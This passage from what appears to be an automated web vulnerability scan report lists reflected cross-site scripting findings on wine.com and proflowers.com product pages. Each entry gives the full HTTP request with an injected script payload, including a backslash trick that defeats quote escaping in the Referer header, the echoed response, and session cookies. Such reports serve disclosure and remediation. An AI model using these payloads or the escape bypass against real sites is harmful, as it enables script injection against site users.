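The point of canonicalDecode is not that blocklisting becomes safe once the input is fully decoded; it is that any check must see the same form of the value that the page finally uses, and that attribute encoding on output is what prevents the injection.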

Request

GET /v6/giftcenter/proflowersproduct.aspxbe123%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2a0408d74d HTTP/1.1
Host: www.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
Set-Cookie: SessionGUID=A81C8266%2DEEDF%2D4C73%2D9B72%2D85023ED23A29; expires=Sat, 11-Feb-2012 22:06:18 GMT; domain=www.wine.com; path=/
Set-Cookie: ASPSESSIONIDACBBTDTS=JNPFPHNCHIMNNMJFAGJIBNEB; path=/
Cache-control: private
Content-Length: 33288
Date: Fri, 11 Feb 2011 22:06:18 GMT
Connection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/v6/giftcenter/proflowersproduct.aspxbe123"><script>alert(1)</script>f2a0408d74d" value="" />
...[SNIP]...

2.87. http://products.proflowers.com/flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/15-Sweetheart-Tulips-with-Chocolates-30007882

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56d19\"%3balert(1)//701eaddac4a was submitted in the Referer HTTP header. This input was echoed as 56d19\\";alert(1)//701eaddac4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash (\) before any quotation mark in the input, so that the quotation mark is escaped and cannot end the string. However, it does not escape backslashes that already appear in the input. An attacker can therefore supply a backslash immediately before the quotation mark: the backslash added by the application then escapes the attacker's backslash rather than the quotation mark, which remains unescaped and terminates the string. The attack demonstrated uses this technique. The fix is to escape the backslash itself, before the quotation mark, or to use a proper JavaScript string encoder.

Because the user data that is copied into the response is submitted within a request header, this behaviour is not trivial to exploit against another user. In the past, client-side technologies such as Flash could be used to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability. Note, however, that the Referer value is derived from the URL of the page the user came from, so an attacker who induces the victim to follow a link from an attacker-controlled URL containing the payload has some control over this header; how much depends on the browser's referrer policy and on which characters it percent-encodes in the URL.

Request

GET /flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=56d19\"%3balert(1)//701eaddac4a

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30007882&2/11/2011 2:40:39 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:40:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:40:39 GMT
Connection: close
Content-Length: 160106


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30007882","30007882","30007882","418466","72","organicgglgeneric_56d19\\";alert(1)//701eaddac4a","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.88. http://products.proflowers.com/flowers/A-Valentines-Romance-30046586 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/A-Valentines-Romance-30046586

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddf49\"%3balert(1)//fd50993c539 was submitted in the Referer HTTP header. This input was echoed as ddf49\\";alert(1)//fd50993c539 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash (\) before any quotation mark in the input, so that the quotation mark is escaped and cannot end the string. However, it does not escape backslashes that already appear in the input. An attacker can therefore supply a backslash immediately before the quotation mark: the backslash added by the application then escapes the attacker's backslash rather than the quotation mark, which remains unescaped and terminates the string. The attack demonstrated uses this technique. The fix is to escape the backslash itself, before the quotation mark, or to use a proper JavaScript string encoder.

Because the user data that is copied into the response is submitted within a request header, this behaviour is not trivial to exploit against another user. In the past, client-side technologies such as Flash could be used to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability. Note, however, that the Referer value is derived from the URL of the page the user came from, so an attacker who induces the victim to follow a link from an attacker-controlled URL containing the payload has some control over this header; how much depends on the browser's referrer policy and on which characters it percent-encodes in the URL.

Request

GET /flowers/A-Valentines-Romance-30046586 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=ddf49\"%3balert(1)//fd50993c539

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30046586&2/11/2011 2:40:24 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:40:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:40:24 GMT
Connection: close
Content-Length: 161094


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30046586","30046586","30046586","405390","72","organicgglgeneric_ddf49\\";alert(1)//fd50993c539","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.89. http://products.proflowers.com/flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc43c\"%3balert(1)//6a0c3a4df9f was submitted in the Referer HTTP header. This input was echoed as fc43c\\";alert(1)//6a0c3a4df9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash (\) before any quotation mark in the input, so that the quotation mark is escaped and cannot end the string. However, it does not escape backslashes that already appear in the input. An attacker can therefore supply a backslash immediately before the quotation mark: the backslash added by the application then escapes the attacker's backslash rather than the quotation mark, which remains unescaped and terminates the string. The attack demonstrated uses this technique. The fix is to escape the backslash itself, before the quotation mark, or to use a proper JavaScript string encoder.

Because the user data that is copied into the response is submitted within a request header, this behaviour is not trivial to exploit against another user. In the past, client-side technologies such as Flash could be used to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability. Note, however, that the Referer value is derived from the URL of the page the user came from, so an attacker who induces the victim to follow a link from an attacker-controlled URL containing the payload has some control over this header; how much depends on the browser's referrer policy and on which characters it percent-encodes in the URL.

Request

GET /flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=fc43c\"%3balert(1)//6a0c3a4df9f

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?40752&2/11/2011 2:40:17 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:40:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:40:17 GMT
Connection: close
Content-Length: 154848


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
endarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("40752","40752","40752","73103","72","organicgglgeneric_fc43c\\";alert(1)//6a0c3a4df9f","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.90. http://products.proflowers.com/flowers/Valentines-Day-Bouquet-30045703 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Valentines-Day-Bouquet-30045703

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63bd1\"%3balert(1)//70a1cda672b was submitted in the Referer HTTP header. This input was echoed as 63bd1\\";alert(1)//70a1cda672b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash (\) before any quotation mark in the input, so that the quotation mark is escaped and cannot end the string. However, it does not escape backslashes that already appear in the input. An attacker can therefore supply a backslash immediately before the quotation mark: the backslash added by the application then escapes the attacker's backslash rather than the quotation mark, which remains unescaped and terminates the string. The attack demonstrated uses this technique. The fix is to escape the backslash itself, before the quotation mark, or to use a proper JavaScript string encoder.

Because the user data that is copied into the response is submitted within a request header, this behaviour is not trivial to exploit against another user. In the past, client-side technologies such as Flash could be used to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability. Note, however, that the Referer value is derived from the URL of the page the user came from, so an attacker who induces the victim to follow a link from an attacker-controlled URL containing the payload has some control over this header; how much depends on the browser's referrer policy and on which characters it percent-encodes in the URL.

Request

GET /flowers/Valentines-Day-Bouquet-30045703 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=63bd1\"%3balert(1)//70a1cda672b

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30045703&2/11/2011 2:39:50 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:39:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:39:50 GMT
Connection: close
Content-Length: 168236


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Entry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30045703","30045703","30045703","405366","72","organicgglgeneric_63bd1\\";alert(1)//70a1cda672b","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.91. http://products.proflowers.com/roses/Two-Dozen-Long-Stemmed-Red-Roses-504 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/Two-Dozen-Long-Stemmed-Red-Roses-504

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138e4\"%3balert(1)//0d999bc9648 was submitted in the Referer HTTP header. This input was echoed as 138e4\\";alert(1)//0d999bc9648 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash (\) before any quotation mark in the input, so that the quotation mark is escaped and cannot end the string. However, it does not escape backslashes that already appear in the input. An attacker can therefore supply a backslash immediately before the quotation mark: the backslash added by the application then escapes the attacker's backslash rather than the quotation mark, which remains unescaped and terminates the string. The attack demonstrated uses this technique. The fix is to escape the backslash itself, before the quotation mark, or to use a proper JavaScript string encoder.

Because the user data that is copied into the response is submitted within a request header, this behaviour is not trivial to exploit against another user. In the past, client-side technologies such as Flash could be used to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability. Note, however, that the Referer value is derived from the URL of the page the user came from, so an attacker who induces the victim to follow a link from an attacker-controlled URL containing the payload has some control over this header; how much depends on the browser's referrer policy and on which characters it percent-encodes in the URL.

Request

GET /roses/Two-Dozen-Long-Stemmed-Red-Roses-504 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=138e4\"%3balert(1)//0d999bc9648

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?504&2/11/2011 2:39:30 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:39:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:39:32 GMT
Connection: close
Content-Length: 169019


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
adCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("504","504","504","298241","72","organicgglgeneric_138e4\\";alert(1)//0d999bc9648","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.92. http://products.proflowers.com/tulips/20-Rainbow-Valentines-Tulips-426 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /tulips/20-Rainbow-Valentines-Tulips-426

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abfa\"%3balert(1)//42c9bbf7a62 was submitted in the Referer HTTP header. This input was echoed as 3abfa\\";alert(1)//42c9bbf7a62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash (\) before any quotation mark in the input, so that the quotation mark is escaped and cannot end the string. However, it does not escape backslashes that already appear in the input. An attacker can therefore supply a backslash immediately before the quotation mark: the backslash added by the application then escapes the attacker's backslash rather than the quotation mark, which remains unescaped and terminates the string. The attack demonstrated uses this technique. The fix is to escape the backslash itself, before the quotation mark, or to use a proper JavaScript string encoder.

Because the user data that is copied into the response is submitted within a request header, this behaviour is not trivial to exploit against another user. In the past, client-side technologies such as Flash could be used to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability. Note, however, that the Referer value is derived from the URL of the page the user came from, so an attacker who induces the victim to follow a link from an attacker-controlled URL containing the payload has some control over this header; how much depends on the browser's referrer policy and on which characters it percent-encodes in the URL.

Request

GET /tulips/20-Rainbow-Valentines-Tulips-426 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;
Referer: http://www.google.com/search?hl=en&q=3abfa\"%3balert(1)//42c9bbf7a62

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?426&2/11/2011 2:39:36 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:39:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:39:36 GMT
Connection: close
Content-Length: 166842


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
adCalendarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("426","426","426","409373","72","organicgglgeneric_3abfa\\";alert(1)//42c9bbf7a62","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.93. http://products.proflowers.com/tulips/20-Sweetheart-Tulips-2744 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /tulips/20-Sweetheart-Tulips-2744

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9c52\"%3balert(1)//ffa0aa0cec3 was submitted in the Referer HTTP header. This input was echoed as e9c52\\";alert(1)//ffa0aa0cec3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash (\) before any quotation mark in the input, so that the quotation mark is escaped and cannot end the string. However, it does not escape backslashes that already appear in the input. An attacker can therefore supply a backslash immediately before the quotation mark: the backslash added by the application then escapes the attacker's backslash rather than the quotation mark, which remains unescaped and terminates the string. The attack demonstrated uses this technique. The fix is to escape the backslash itself, before the quotation mark, or to use a proper JavaScript string encoder.

Because the user data that is copied into the response is submitted within a request header, this behaviour is not trivial to exploit against another user. In the past, client-side technologies such as Flash could be used to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability. Note, however, that the Referer value is derived from the URL of the page the user came from, so an attacker who induces the victim to follow a link from an attacker-controlled URL containing the payload has some control over this header; how much depends on the browser's referrer policy and on which characters it percent-encodes in the URL.

Request

GET /tulips/20-Sweetheart-Tulips-2744 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
